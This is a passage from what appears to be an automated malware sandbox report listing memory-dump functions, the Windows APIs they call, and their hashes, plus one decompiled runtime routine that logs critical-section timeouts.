Opcode Fuzzy Hash: 049f3ee8a2783d8f4fc07887880878c18beec288a28d2db1a6dfc0034b8a3c98
Instruction Fuzzy Hash: 77900266311000132105A5590704507004AD7D5395351C065F1006590DD661D8717161

Uniqueness

Uniqueness Score: -1.00%

Function 04B396E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B396EA

Memory Dump Source

Source File: 00000018.00000002.464600721.0000000004AD0000.00000040.00000001.sdmp, Offset: 04AD0000, based on PE: true

Associated: 00000018.00000002.465343693.0000000004BEB000.00000040.00000001.sdmp Download File
Associated: 00000018.00000002.465357087.0000000004BEF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ffdc36c444bdbdd3d6e44f389b7959413d866c1b7beaf2f6b9b44c2485980937
Instruction ID: 1fade4f49a4dfa6a53af72acd886eabc53e02e86c2ae9e0a7bda5b720a47bce1
Opcode Fuzzy Hash: ffdc36c444bdbdd3d6e44f389b7959413d866c1b7beaf2f6b9b44c2485980937
Instruction Fuzzy Hash: 9790027230108812F1106159840474A0009D7D0345F55C455A4415698E86D5D8A17161

Uniqueness

Uniqueness Score: -1.00%

Function 04B396D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B396DA

Memory Dump Source

Source File: 00000018.00000002.464600721.0000000004AD0000.00000040.00000001.sdmp, Offset: 04AD0000, based on PE: true

Associated: 00000018.00000002.465343693.0000000004BEB000.00000040.00000001.sdmp Download File
Associated: 00000018.00000002.465357087.0000000004BEF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eca3e649dbc1c3b478e1670f9c1b99689b7cddc05ee306c67fa71420462176ba
Instruction ID: 6be26fc72f3edf7dd9eebd23374e3b0eba97b223e5d926156311ee209e1a4a56
Opcode Fuzzy Hash: eca3e649dbc1c3b478e1670f9c1b99689b7cddc05ee306c67fa71420462176ba
Instruction Fuzzy Hash: 0A90027230100852F10061594404B460009D7E0345F51C05AA0115694E8655D8617561

Uniqueness

Uniqueness Score: -1.00%

Function 04B39610, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B3961A

Memory Dump Source

Source File: 00000018.00000002.464600721.0000000004AD0000.00000040.00000001.sdmp, Offset: 04AD0000, based on PE: true

Associated: 00000018.00000002.465343693.0000000004BEB000.00000040.00000001.sdmp Download File
Associated: 00000018.00000002.465357087.0000000004BEF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2c1a737edadd61fa4ce3f1a557d6a86cc887ae2d2501b0c118fb2f2fd87f565b
Instruction ID: 9b49d04d1a8c73455d1ac502d77554d4543620fbbc052405c5fadd56288ae24a
Opcode Fuzzy Hash: 2c1a737edadd61fa4ce3f1a557d6a86cc887ae2d2501b0c118fb2f2fd87f565b
Instruction Fuzzy Hash: 6B90027270500812F150715944147460009D7D0345F51C055A0015694E8795DA6576E1

Uniqueness

Uniqueness Score: -1.00%

Function 04B39660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B3966A

Memory Dump Source

Source File: 00000018.00000002.464600721.0000000004AD0000.00000040.00000001.sdmp, Offset: 04AD0000, based on PE: true

Associated: 00000018.00000002.465343693.0000000004BEB000.00000040.00000001.sdmp Download File
Associated: 00000018.00000002.465357087.0000000004BEF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ba9d028af3441a1b88f367774c938f437393c786b87778bf723bccb5151f25c4
Instruction ID: defd35346224f7524db739dea42a2e47b21dff7b4e6dcda0eba92c3ba802ab60
Opcode Fuzzy Hash: ba9d028af3441a1b88f367774c938f437393c786b87778bf723bccb5151f25c4
Instruction Fuzzy Hash: 7D90027230100812F1807159440464A0009D7D1345F91C059A0016694ECA55DA6977E1

Uniqueness

Uniqueness Score: -1.00%

Function 04B39650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B3965A

Memory Dump Source

Source File: 00000018.00000002.464600721.0000000004AD0000.00000040.00000001.sdmp, Offset: 04AD0000, based on PE: true

Associated: 00000018.00000002.465343693.0000000004BEB000.00000040.00000001.sdmp Download File
Associated: 00000018.00000002.465357087.0000000004BEF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 919df35e69ae18c97fa6ebed492fff75741277112e30c3d74c0a72c546b8f88c
Instruction ID: 440debfc5392543a9635c42d4776fcb5071d4ea8111d8a179df9031dbf9c2960
Opcode Fuzzy Hash: 919df35e69ae18c97fa6ebed492fff75741277112e30c3d74c0a72c546b8f88c
Instruction Fuzzy Hash: E590027230504852F14071594404A460019D7D0349F51C055A00556D4E9665DD65B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 04B39780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B3978A

Memory Dump Source

Source File: 00000018.00000002.464600721.0000000004AD0000.00000040.00000001.sdmp, Offset: 04AD0000, based on PE: true

Associated: 00000018.00000002.465343693.0000000004BEB000.00000040.00000001.sdmp Download File
Associated: 00000018.00000002.465357087.0000000004BEF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1231fa498805420083aeb82ccf32b554f463cc3979a44319cd77f64d3084634d
Instruction ID: 2746f6e015a57a8c1463988b0f1fad4cc168248ced07e409abbbca849860606e
Opcode Fuzzy Hash: 1231fa498805420083aeb82ccf32b554f463cc3979a44319cd77f64d3084634d
Instruction Fuzzy Hash: C590026A31300012F1807159540860A0009D7D1246F91D459A0006598DC955D8797361

Uniqueness

Uniqueness Score: -1.00%

Function 04B39FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B39FEA

Memory Dump Source

Source File: 00000018.00000002.464600721.0000000004AD0000.00000040.00000001.sdmp, Offset: 04AD0000, based on PE: true

Associated: 00000018.00000002.465343693.0000000004BEB000.00000040.00000001.sdmp Download File
Associated: 00000018.00000002.465357087.0000000004BEF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dceb35cf0ce14bc60d66290342f16bcf65b91bbf12e5dc605a76a1944eb4691c
Instruction ID: 16ade49097a4bb6e70acdf44122fe17d181ad68e6b774fa3d6ab971d0a423f57
Opcode Fuzzy Hash: dceb35cf0ce14bc60d66290342f16bcf65b91bbf12e5dc605a76a1944eb4691c
Instruction Fuzzy Hash: 4390027231114412F110615984047060009D7D1245F51C455A0815598E86D5D8A17162

Uniqueness

Uniqueness Score: -1.00%

Function 04B39710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B3971A

Memory Dump Source

Source File: 00000018.00000002.464600721.0000000004AD0000.00000040.00000001.sdmp, Offset: 04AD0000, based on PE: true

Associated: 00000018.00000002.465343693.0000000004BEB000.00000040.00000001.sdmp Download File
Associated: 00000018.00000002.465357087.0000000004BEF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 97e7e573cecb515f757c25edb142db6d44d5f5e7bc461964e0c3eee33375ea5b
Instruction ID: 0a2f1bd175046b34bd5e3c1c11ca9c4206d809b9848ad314d4e84e7eb4297ad8
Opcode Fuzzy Hash: 97e7e573cecb515f757c25edb142db6d44d5f5e7bc461964e0c3eee33375ea5b
Instruction Fuzzy Hash: 2D90027230100412F100659954086460009D7E0345F51D055A5015595FC6A5D8A17171

Uniqueness

Uniqueness Score: -1.00%

Function 04B39770, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B3977A

Memory Dump Source

Source File: 00000018.00000002.464600721.0000000004AD0000.00000040.00000001.sdmp, Offset: 04AD0000, based on PE: true

Associated: 00000018.00000002.465343693.0000000004BEB000.00000040.00000001.sdmp Download File
Associated: 00000018.00000002.465357087.0000000004BEF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f819ad32cd2762797bf8f774c29eacab3820b2fa283d52ec8ba1b6fb2fdb6337
Instruction ID: 7187e1156e96ec1c881fa65e66ab8ce207b30cd1e132669e52a30db1a007e215
Opcode Fuzzy Hash: f819ad32cd2762797bf8f774c29eacab3820b2fa283d52ec8ba1b6fb2fdb6337
Instruction Fuzzy Hash: AD90026230504452F10065595408A060009D7D0249F51D055A10555D5EC675D861B171

Uniqueness

Uniqueness Score: -1.00%

Function 04B39860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B3986A

Memory Dump Source

Source File: 00000018.00000002.464600721.0000000004AD0000.00000040.00000001.sdmp, Offset: 04AD0000, based on PE: true

Associated: 00000018.00000002.465343693.0000000004BEB000.00000040.00000001.sdmp Download File
Associated: 00000018.00000002.465357087.0000000004BEF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 848dbf88a8b63400b712c1803044da05085f3833fc59e724cb896b4f9ec1dee7
Instruction ID: a0357f0a060922a6c121eeb2956e35a0d4295d7d99c3fcc0bc3a6251e0784992
Opcode Fuzzy Hash: 848dbf88a8b63400b712c1803044da05085f3833fc59e724cb896b4f9ec1dee7
Instruction Fuzzy Hash: B390027230100423F11161594504707000DD7D0285F91C456A0415598E9696D962B161

Uniqueness

Uniqueness Score: -1.00%

Function 04B39840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B3984A

Memory Dump Source

Source File: 00000018.00000002.464600721.0000000004AD0000.00000040.00000001.sdmp, Offset: 04AD0000, based on PE: true

Associated: 00000018.00000002.465343693.0000000004BEB000.00000040.00000001.sdmp Download File
Associated: 00000018.00000002.465357087.0000000004BEF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 66e111337df268b3bfde092fe9992ae4b7ec42a9d4b14b1c8ee907c8c49d33a4
Instruction ID: 036842608619f740794dee095f793a61e12e357bb052fd899949eb4be22ec63d
Opcode Fuzzy Hash: 66e111337df268b3bfde092fe9992ae4b7ec42a9d4b14b1c8ee907c8c49d33a4
Instruction Fuzzy Hash: 5C900262342041627545B1594404507400AE7E0285791C056A1405990D8566E866F661

Uniqueness

Uniqueness Score: -1.00%

Function 04B399A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B399AA

Memory Dump Source

Source File: 00000018.00000002.464600721.0000000004AD0000.00000040.00000001.sdmp, Offset: 04AD0000, based on PE: true

Associated: 00000018.00000002.465343693.0000000004BEB000.00000040.00000001.sdmp Download File
Associated: 00000018.00000002.465357087.0000000004BEF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2b4d045576f620b4d84e297f970236d0541b373442df85a9ba267176fad4e9e4
Instruction ID: 5f14eb8371f08311c642209bbee490c899b2a83408e72f7e25b459c92d63544b
Opcode Fuzzy Hash: 2b4d045576f620b4d84e297f970236d0541b373442df85a9ba267176fad4e9e4
Instruction Fuzzy Hash: F99002A234100452F10061594414B060009D7E1345F51C059E1055594E8659DC627166

Uniqueness

Uniqueness Score: -1.00%

Function 04B39910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B3991A

Memory Dump Source

Source File: 00000018.00000002.464600721.0000000004AD0000.00000040.00000001.sdmp, Offset: 04AD0000, based on PE: true

Associated: 00000018.00000002.465343693.0000000004BEB000.00000040.00000001.sdmp Download File
Associated: 00000018.00000002.465357087.0000000004BEF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 36aa990e7b94a18e796c8046b77aff7c48649fe052e8ac6326a796f474b1e830
Instruction ID: 94c3a2d6087a77fdc4c80aaa8c2f311b8dc31eae45c390a09b343a8b4acf997a
Opcode Fuzzy Hash: 36aa990e7b94a18e796c8046b77aff7c48649fe052e8ac6326a796f474b1e830
Instruction Fuzzy Hash: 2C9002B230100412F140715944047460009D7D0345F51C055A5055594F8699DDE576A5

Uniqueness

Uniqueness Score: -1.00%

Function 04B39A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B39A5A

Memory Dump Source

Source File: 00000018.00000002.464600721.0000000004AD0000.00000040.00000001.sdmp, Offset: 04AD0000, based on PE: true

Associated: 00000018.00000002.465343693.0000000004BEB000.00000040.00000001.sdmp Download File
Associated: 00000018.00000002.465357087.0000000004BEF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8ba9cea0d4e48d324dd9f4e25a6d163fd1e7dbb3e0f15ba90b8d3118dc952451
Instruction ID: e24690f44b2024d83ffe713033dc3421977e83efdb31a381d13db2803018136d
Opcode Fuzzy Hash: 8ba9cea0d4e48d324dd9f4e25a6d163fd1e7dbb3e0f15ba90b8d3118dc952451
Instruction Fuzzy Hash: 7390026231180052F20065694C14B070009D7D0347F51C159A0145594DC955D8717561

Uniqueness

Uniqueness Score: -1.00%

Function 04B39B00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B39B0A

Memory Dump Source

Source File: 00000018.00000002.464600721.0000000004AD0000.00000040.00000001.sdmp, Offset: 04AD0000, based on PE: true

Associated: 00000018.00000002.465343693.0000000004BEB000.00000040.00000001.sdmp Download File
Associated: 00000018.00000002.465357087.0000000004BEF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ec6acee4f2a9e51dd31e921bb8abcb82b0d212097354e76ad7dee8b7b9d67c17
Instruction ID: 3e15b1f0185702e5626bf7648a8732663e0b96dab61ef50511be1c56c30f5a09
Opcode Fuzzy Hash: ec6acee4f2a9e51dd31e921bb8abcb82b0d212097354e76ad7dee8b7b9d67c17
Instruction Fuzzy Hash: DD90026234100812F14071598414707000AD7D0645F51C055A0015594E8656D97576F1

Uniqueness

Uniqueness Score: -1.00%

Function 003EA052, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,003D3AF8), ref: 003EA08D

Strings

.z`, xrefs: 003EA07C, 003EA088

Memory Dump Source

Source File: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 94062a86269f8d35f3f9a6c1f9ebd26e67799a5926c0e755d6526cb228cc15d2
Instruction ID: fa639d9ba637edf5fde14f40ab0e5e3b6ae845dae9481d7b73ec83f8d6568c84
Opcode Fuzzy Hash: 94062a86269f8d35f3f9a6c1f9ebd26e67799a5926c0e755d6526cb228cc15d2
Instruction Fuzzy Hash: E2E06DB16102046BDB18DF99DC85EA7776CAF88710F018659FA486B281C630FD01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 003EA020, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(003E44F6,?,?,oL>,?,003E44F6,?,?,?,?,?,00000000,00000000,?), ref: 003EA04D

Strings

oL>, xrefs: 003EA029

Memory Dump Source

Source File: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID: oL>
API String ID: 1279760036-560416941
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: aecb755199e135cdffb5a14aeac753d815d6e537afb5ab4270aceea6cb1a6302
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: BAE012B1200218ABDB14EF99CC41EA777ACAF88650F128558BA185B282C630F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 003EA060, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,003D3AF8), ref: 003EA08D

Strings

.z`, xrefs: 003EA07C, 003EA088

Memory Dump Source

Source File: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 52e459e74afed7e7a493fbb31739438bc873e7e21d2b01c979c057221f005ab2
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 2BE01AB12002186BDB14DF59CC45EA777ACAF88750F014554B9185B242C630F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 003E2720, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000,00000000,003D3A1A,00000000), ref: 003E2737

Strings

@J7<, xrefs: 003E274B

Memory Dump Source

Source File: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: Initialize
String ID: @J7<
API String ID: 2538663250-2016760708
Opcode ID: f7c42ef3f2e190e19b0f59f29c49dc019863421e70f0ec23ee69fef3a316fc28
Instruction ID: 5705e6d3c552e1fc7e3a73e3fc7c600d4823e035a18de975502c758e2b8e4b86
Opcode Fuzzy Hash: f7c42ef3f2e190e19b0f59f29c49dc019863421e70f0ec23ee69fef3a316fc28
Instruction Fuzzy Hash: 233150B5A0021A9FDB01DFD9C8809EFB3B9BF88304B108559E505EB244D771EE45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 003D82E8, Relevance: 3.1, APIs: 2, Instructions: 57threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 003D834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 003D836B

Memory Dump Source

Source File: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 56a4dcd3fc9433c62007fbba1a9c50dcf08de780d4800485923d87da2aa90d38
Instruction ID: 23d97046dd96b2a1a0ba396c7cfbc10fb7686a12588dc64d98b38bc523a3d753
Opcode Fuzzy Hash: 56a4dcd3fc9433c62007fbba1a9c50dcf08de780d4800485923d87da2aa90d38
Instruction Fuzzy Hash: 4801DD319402647BEB2267959C43FFE7B2C6F40B51F154119FF04BE2C2D695690647E1

Uniqueness

Uniqueness Score: -1.00%

Function 003D82F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 003D834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 003D836B

Memory Dump Source

Source File: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 3a4e297d6358ca4c5fcfaaa3c28cbe006d389f12942e8d51d1e074f6e8d9d436
Instruction ID: 2c73e09dab03244e7d50a5b93118ec060edff6c359d63917eac9d3efc9690cd5
Opcode Fuzzy Hash: 3a4e297d6358ca4c5fcfaaa3c28cbe006d389f12942e8d51d1e074f6e8d9d436
Instruction Fuzzy Hash: 46018436A802687AE722A6959C03FBE766C6B40F50F054119FF04BE2C1EA94690646E6

Uniqueness

Uniqueness Score: -1.00%

Function 003DACC0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 003DAD32

Memory Dump Source

Source File: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction ID: 0c539b1801bd75c6c26c0ba8c9ee04c66e8ae209cf571d72ff6bb8e4bfa14df6
Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction Fuzzy Hash: 970125B6D0020DABDF11DBE5DD42FDDB378AB54304F0042A5E9199B281F631EB55C791

Uniqueness

Uniqueness Score: -1.00%

Function 003EA0D0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 003EA124

Memory Dump Source

Source File: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 33688ca56c96a69b801d858a668ad2dfb9f37b7ffada38784d752d14f394eaa3
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 9401AFB2210108AFCB54DF89DC81EEB77ADAF8C754F158258BA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 003EA0CF, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 003EA124

Memory Dump Source

Source File: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 32d76940b5f4c8352c1f5a34af0c0dbb4f25cbd2f35e702fd3c31392ca50af34
Instruction ID: 820d5a8f3f9ff28253f615ba3e311643c27fe9118f13a117c202be8d0dd37b75
Opcode Fuzzy Hash: 32d76940b5f4c8352c1f5a34af0c0dbb4f25cbd2f35e702fd3c31392ca50af34
Instruction Fuzzy Hash: 2C01B2B2210108BFCB54DF89DC81EEB77ADAF8C754F158258FA1D97241C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 003EA1C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,003DF192,003DF192,?,00000000,?,?), ref: 003EA1F0

Memory Dump Source

Source File: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 821672f808c7f12ab70792c6c0e98386c8d79bc4823011606823cf5f25ca0665
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 3EE01AB12002186BDB10DF49CC85EE737ADAF88650F018154BA0C5B242CA30F8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 003DF690, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,003D8CF4,?), ref: 003DF6BB

Memory Dump Source

Source File: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction ID: 3bc2573396ad4f5dcf7b022d5aeb50bc1b8c872d50fb2f6cb55f51cbdb0d7c15
Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction Fuzzy Hash: 21D0A7727903043BE611FAA59C03F2672CC6B44B00F490074F949DB3C3D960E4004165

Uniqueness

Uniqueness Score: -1.00%

Function 003DF687, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,003D8CF4,?), ref: 003DF6BB

Memory Dump Source

Source File: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 10f5a01e0be95fab665b601c25689c38c754ac10118e3f0d51a46057cfe1297a
Instruction ID: dffc1284616c12e46574d4c65b4779498f642ce3dd7dec0074f75d7f7421143d
Opcode Fuzzy Hash: 10f5a01e0be95fab665b601c25689c38c754ac10118e3f0d51a46057cfe1297a
Instruction Fuzzy Hash: 8DD02E767803003AEB01EEA0DD03F2A3388BB84304F4A0828F809EF3D3EA34D0208265

Uniqueness

Uniqueness Score: -1.00%

Function 04B3967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B39694

Memory Dump Source

Source File: 00000018.00000002.464600721.0000000004AD0000.00000040.00000001.sdmp, Offset: 04AD0000, based on PE: true

Associated: 00000018.00000002.465343693.0000000004BEB000.00000040.00000001.sdmp Download File
Associated: 00000018.00000002.465357087.0000000004BEF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 244e741db0f1d0a5f80de7b684c33710ce3e709814723adf258cf81ad17b26ef
Instruction ID: 3622b6930e6fcb65918797b788039e71cbced4d8134338032d71b44c12c4b559
Opcode Fuzzy Hash: 244e741db0f1d0a5f80de7b684c33710ce3e709814723adf258cf81ad17b26ef
Instruction Fuzzy Hash: 74B09BB29064C5D5F711D76146087177904F7D0745F16C095D1020681B4778E091F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04B8FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E04B8FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04B3CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04B85720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04B85720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x04b8fdda
0x04b8fde2
0x04b8fde5
0x04b8fdec
0x04b8fdfa
0x04b8fdff
0x04b8fe0a
0x04b8fe0f
0x04b8fe17
0x04b8fe1e
0x04b8fe19
0x04b8fe19
0x04b8fe19
0x04b8fe20
0x04b8fe21
0x04b8fe22
0x04b8fe25
0x04b8fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04B8FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04B8FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04B8FE01

Memory Dump Source

Source File: 00000018.00000002.464600721.0000000004AD0000.00000040.00000001.sdmp, Offset: 04AD0000, based on PE: true

Associated: 00000018.00000002.465343693.0000000004BEB000.00000040.00000001.sdmp Download File
Associated: 00000018.00000002.465357087.0000000004BEF000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
